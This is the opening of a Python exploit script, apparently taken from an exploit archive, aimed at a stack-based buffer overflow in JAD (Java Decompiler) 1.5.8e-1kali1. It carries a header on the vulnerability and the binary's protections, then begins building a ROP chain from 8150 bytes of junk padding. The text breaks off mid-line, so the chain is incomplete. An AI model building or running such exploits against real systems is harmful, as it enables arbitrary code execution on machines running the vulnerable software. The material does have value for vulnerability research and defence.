#!/usr/bin/python # Exploit Author: Juan Sacco at KPN Red Team - http://www.kpn.com # Developed using Exploit Pack - http://exploitpack.com - # Tested on: GNU/Linux - Kali 2017.1 Release # # Description: JAD ( Java Decompiler ) 1.5.8e-1kali1 and prior is prone to a stack-based buffer overflow # vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. # # An attacker could exploit this vulnerability to execute arbitrary code in the # context of the application. Failed exploit attempts will result in a # denial-of-service condition. # # Package details: # Version: 1.5.8e-1kali1 # Architecture: all # Maintainer: Devon Kearns # # Vendor homepage: http://www.varaneckas.com/jad/ # # CANARY : disabled # FORTIFY : disabled # NX : ENABLED # PIE : disabled # RELRO : disabled # import os, subprocess from struct import pack ropchain = "A"*8150 # junk ropchain += pack('